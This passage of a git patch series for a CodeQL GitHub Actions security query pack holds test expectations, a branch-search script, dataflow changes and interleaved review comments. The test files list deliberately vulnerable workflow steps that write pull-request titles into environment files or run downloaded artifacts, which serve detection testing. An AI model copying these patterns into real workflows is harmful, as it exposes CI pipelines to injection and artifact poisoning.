.github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | semmle.label | Job: test4 [CHANGED-FILES] | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:48:21:48:44 | 
env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | semmle.label | Job: test3 [TITLE] | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| 
.github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | semmle.label | github.event['pull_request']['body'] | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/untrusted_checkout1.yml:11:9:14:6 | Run Step: artifact [pr_number] | semmle.label | Run Step: artifact [pr_number] | | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo 
"::set-output name=pr_number::$(> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | Config | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | Config | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | Config 
| +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | Config | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | 
Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -51,7 +48,6 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index e1532c06cdc8..8d9465077995 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -1,24 +1,21 @@ edges -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | provenance | | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 
| Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | Config | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | 
.github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | Config | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | Config | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | 
provenance | Config | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -51,7 +48,6 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths From 48fa2967eda4212a5082b9a460351375152b2754 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:22:40 +0200 Subject: [PATCH 578/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- search_branches.py | 88 ++++++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 90 insertions(+), 2 deletions(-) create mode 100644 search_branches.py diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 91329e4f347e..229b1f81c7be 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.65 +version: 0.1.66 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1689480b56b8..e03e2a45cb72 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.65 +version: 0.1.66 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/search_branches.py b/search_branches.py new file mode 100644 index 000000000000..d0036169fea3 --- /dev/null +++ b/search_branches.py 
@@ -0,0 +1,88 @@
+import base64
+import os
+import re
+import sys
+import time
+
+import requests
+
+
+def handle_rate_limit(response, wait_time=60):
+ return False
+
+
+def search_branches(repo_nwo, file_path, regex_pattern):
+ # GitHub API base URL
+ base_url = "https://api.github.com"
+
+ # Get GitHub token from environment variable
+ github_token = os.environ.get("GITHUB_TOKEN")
+ if not github_token:
+ print("Error: GITHUB_TOKEN environment variable not set")
+ sys.exit(1)
+
+ # Set up headers for authenticated requests
+ headers = {
+ "Authorization": f"token {github_token}",
+ "Accept": "application/vnd.github.v3+json",
+ }
+
+ # Get all branches (with pagination)
+ branches_url = f"{base_url}/repos/{repo_nwo}/branches"
+ branches = []
+ while branches_url:
+ branches_response = requests.get(branches_url, headers=headers)
+ if handle_rate_limit(branches_response):
+ continue
+ branches_response.raise_for_status()
+ branches.extend(branches_response.json())
+ branches_url = branches_response.links.get("next", {}).get("url")
+
+ # Compile the regex pattern
+ pattern = re.compile(regex_pattern)
+
+ # Search file contents in each branch
+ for branch in branches:
+ branch_name = branch["name"]
+ file_url = f"{base_url}/repos/{repo_nwo}/contents/{file_path}?ref={branch_name}"
+
+ while True:
+ file_response = requests.get(file_url, headers=headers)
+
+ if file_response.status_code == 200:
+ file_content = file_response.json()["content"]
+
+ decoded_content = base64.b64decode(file_content).decode("utf-8")
+
+ if pattern.search(decoded_content):
+ print(f"Match found in branch: {branch_name}!!!!!")
+ else:
+ print(f"No match found in branch: {branch_name}")
+ break
+ elif file_response.status_code == 404:
+ print(f"File not found in branch: {branch_name}")
+ break
+ elif (
+ file_response.status_code == 403
+ and "X-RateLimit-Remaining" in file_response.headers
+ ):
+ if int(file_response.headers["X-RateLimit-Remaining"]) == 0:
+ reset_time = 
int(file_response.headers["X-RateLimit-Reset"]) + sleep_time = reset_time - int(time.time()) + 1 + print(f"Rate limit exceeded. Waiting for {sleep_time} seconds.") + time.sleep(sleep_time) + + +if __name__ == "__main__": + if len(sys.argv) != 4: + print("Usage: python search_branches.py ") + sys.exit(1) + + repo_nwo = sys.argv[1] + file_path = sys.argv[2] + regex_pattern = sys.argv[3] + + print( + f"Searching branches in {repo_nwo} for {file_path} with pattern {regex_pattern}" + ) + search_branches(repo_nwo, file_path, regex_pattern) From c7b57b5b771b5cbda25e252bffdcfc1900f18498 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 13 Oct 2024 11:55:41 +0200 Subject: [PATCH 579/707] Merge command and file store steps --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 60 ++++++------------- .../dataflow/internal/DataFlowPrivate.qll | 2 - 2 files changed, 18 insertions(+), 44 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index b0d98d2e6590..787a5f720845 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -49,8 +49,15 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * echo "bar=${foo}" >> "$GITHUB_OUTPUT" */ predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(CommandSource source, Run run, string key, string cmd | - source.getCommand() = cmd and + exists(Run run, string key, string cmd | + ( + exists(CommandSource source | source.getCommand() = cmd) + or + exists(FileSource source | + source.asExpr().(Step).getAFollowingStep() = run and + Bash::outputsPartialFileContent(run, cmd) + ) + ) and Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getScriptScalar() and 
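Review bot: The `while True` retry loop in search_branches never terminates for a response that is not 200, 404, or a 403 whose `X-RateLimit-Remaining` header is 0: a 401, a 5xx, or a 403 with quota left matches no `break` and re-issues the identical request immediately, spinning against the API for as long as the script runs. `handle_rate_limit` is a stub that always returns False, so the `continue` in the branch-listing loop is dead code and that loop has no rate-limit handling at all; both `requests.get` calls also run without a `timeout=`. I would replace the last `elif` with a rate-limit branch that clamps the sleep to at least one second (a skewed clock otherwise yields a negative value) and a terminal `else` that raises and breaks, as below. The usage line near the end, `print("Usage: python search_branches.py ")`, appears to have lost its argument placeholders, presumably to markup stripping.

```python
            # … unchanged: 200 and 404 branches …
            elif (
                file_response.status_code == 403
                and file_response.headers.get("X-RateLimit-Remaining") == "0"
            ):
                reset_time = int(file_response.headers["X-RateLimit-Reset"])
                # clamp: a skewed local clock must not produce a negative sleep
                sleep_time = max(reset_time - int(time.time()) + 1, 1)
                print(f"Rate limit exceeded. Waiting for {sleep_time} seconds.")
                time.sleep(sleep_time)
            else:
                # 401, 5xx, 403 with quota left: fail loudly instead of spinning
                file_response.raise_for_status()
                break
```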
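Review bot: The new disjunction that binds `cmd` from either a `CommandSource` or a `FileSource` followed by `run` is repeated verbatim in `commandToEnvStoreStep` in the next hunk (`@@ -67,8 +74,15 @@`); a private helper such as `private predicate cmdFromSource(Run run, string cmd)` called from both predicates would keep the two from drifting, which is how the separate `fileTo*StoreStep` predicates being deleted here got out of step in the first place. Note also that the `CommandSource` branch does not relate `source` to `run` at all, while the `FileSource` branch requires `getAFollowingStep() = run`; that asymmetry predates this change, but if it is intended a one-line comment saying so would save the next reader the question. Both enclosing predicates start before their hunk.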
@@ -67,8 +74,15 @@ predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Dat * echo "bar=${foo}" >> "$GITHUB_ENV" */ predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(CommandSource source, Run run, string key, string cmd | - source.getCommand() = cmd and + exists(Run run, string key, string cmd | + ( + exists(CommandSource source | source.getCommand() = cmd) + or + exists(FileSource source | + source.asExpr().(Step).getAFollowingStep() = run and + Bash::outputsPartialFileContent(run, cmd) + ) + ) and Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getScriptScalar() and @@ -76,41 +90,3 @@ predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFl succ.asExpr() = run.getEnclosingJob() ) } - -/** - * A downloaded artifact that gets assigned to a Run step output. - * - uses: actions/download-artifact@v2 - * - run: echo "::set-output name=id::$(> "$GITHUB_ENV" - * - run: | - * foo=$(> "$GITHUB_ENV" - */ -predicate fileToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(FileSource source, Run run, string key, string cmd | - source.asExpr().(Step).getAFollowingStep() = run and - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and - Bash::outputsPartialFileContent(run, cmd) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getScriptScalar() and - // we store the taint on the enclosing job since there may not be an implicit env attribute - succ.asExpr() = run.getEnclosingJob() - ) -} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index d7c3dad9ee7e..cf95292588c3 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
@@ -351,8 +351,6 @@ predicate storeStep(Node node1, ContentSet c, Node node2) { madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or - fileToOutputStoreStep(node1, node2, c) or - fileToEnvStoreStep(node1, node2, c) or commandToOutputStoreStep(node1, node2, c) or commandToEnvStoreStep(node1, node2, c) } From a09acb546228a9f11a2ddedd5c5a1ce4d80ea324 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 13 Oct 2024 11:56:09 +0200 Subject: [PATCH 580/707] Better parsing of Bash script commands --- ql/lib/codeql/actions/Bash.qll | 15 ++- ql/lib/codeql/actions/ast/internal/Ast.qll | 97 +++++++++++++++---- .../actions/security/PoisonableSteps.qll | 2 +- 3 files changed, 90 insertions(+), 24 deletions(-) diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 5907b601a46c..fc9a75319ebf 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -8,14 +8,21 @@ module Bash { string commandSeparator() { result = ["&&", "||"] } - string pipeSeparator() { result = "|" } - - string splitSeparators() { - result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() + string splitSeparator() { + result = stmtSeparator() or + result = commandSeparator() } string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + string pipeSeparator() { result = "|" } + + string separator() { + result = stmtSeparator() or + result = commandSeparator() or + result = pipeSeparator() + } + string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } /** Checks if expr is a bash command substitution */ diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index a4b5778246a5..eaf1ae871a9f 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
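Review bot: `splitSeparator()` and `separator()` in the Bash.qll hunk differ only in whether `pipeSeparator()` is included, and neither carries a QLDoc saying which unit of the script it delimits, so a caller has to read `RunImpl` to learn that one yields statements and the other commands. I would document them, e.g. `/** Separators between Bash statements (`;`, `&&`, `||`); a pipeline counts as a single statement. */` on `splitSeparator()` and `/** Separators between individual commands: statement separators plus the pipe. */` on `separator()`. `stmtSeparator()` is defined before the hunk.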
@@ -1438,39 +1438,43 @@ class RunImpl extends StepImpl { max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) } - private string cmdProducer(int i) { - result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparators()).trim() and + private string stmtProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and // when splitting the line with a separator that is not present, the result is the original line which may contain other separators // we only one the split parts that do not contain any of the separators - not result.indexOf(Bash::splitSeparators()) > -1 + not result.indexOf(Bash::splitSeparator()) > -1 } - private predicate doRestoreQuotedStrings(int line, int round, string old, string new) { + private predicate doStmtRestoreQuotedStrings(int line, int round, string old, string new) { round = 0 and - old = this.cmdProducer(line) and + old = this.stmtProducer(line) and new = old or round > 0 and exists(string middle, string target, string replacement | - this.doRestoreQuotedStrings(line, round - 1, old, middle) and + this.doStmtRestoreQuotedStrings(line, round - 1, old, middle) and this.rankedQuotedStringReplacements(round, target, replacement) and new = middle.replaceAll(replacement, target) ) } - private string 